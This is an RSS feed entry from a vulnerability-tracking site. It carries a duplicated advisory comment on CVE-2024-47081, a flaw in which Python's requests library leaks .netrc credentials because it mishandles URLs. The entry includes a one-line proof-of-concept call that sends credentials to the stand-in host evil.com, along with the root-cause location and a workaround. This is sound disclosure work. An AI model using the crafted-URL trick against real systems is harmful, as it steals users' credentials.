https://vulnerability.circl.lu Contains only the most 10 recent comments. http://www.rssboard.org/rss-specification python-feedgen en Wed, 15 Apr 2026 07:35:16 +0000 https://vulnerability.circl.lu/comment/a5ae6fa3-504b-4d03-a153-b9f12f911f71 The PSF requests library (https://github.com/psf/requests & https://pypi.org/project/requests/) leaks .netrc credentials to third parties due to incorrect URL processing under specific conditions. Issuing the following API call triggers the vulnerability: ` requests.get('http://example.com:@evil.com/')` Assuming .netrc credentials are configured for example.com, they are leaked to evil.com by the call. The root cause is https://github.com/psf/requests/blob/c65c780849563c891f35ffc98d3198b71011c012/src/requests/utils.py#L240-L245 The vulnerability was originally reported to the library maintainers on September 12, 2024, but no fix is available. CVE-2024-47081 has been reserved by GitHub for this issue. As a workaround, clients may explicitly specify the credentials used on every API call to disable .netrc access. The PSF requests library (https://github.com/psf/requests & https://pypi.org/project/requests/) leaks .netrc credentials to third parties due to incorrect URL processing under specific conditions. Issuing the following API call triggers the vulnerability: ` requests.get('http://example.com:@evil.com/')` Assuming .netrc credentials are configured for example.com, they are leaked to evil.com by the call. The root cause is https://github.com/psf/requests/blob/c65c780849563c891f35ffc98d3198b71011c012/src/requests/utils.py#L240-L245 The vulnerability was originally reported to the library maintainers on September 12, 2024, but no fix is available. CVE-2024-47081 has been reserved by GitHub for this issue. As a workaround, clients may explicitly specify the credentials used on every API call to disable .netrc access. https://vulnerability.circl.lu/comment/a5ae6fa3-504b-4d03-a153-b9f12f911f71 Wed, 04 Jun 2025 05:03:44 +0000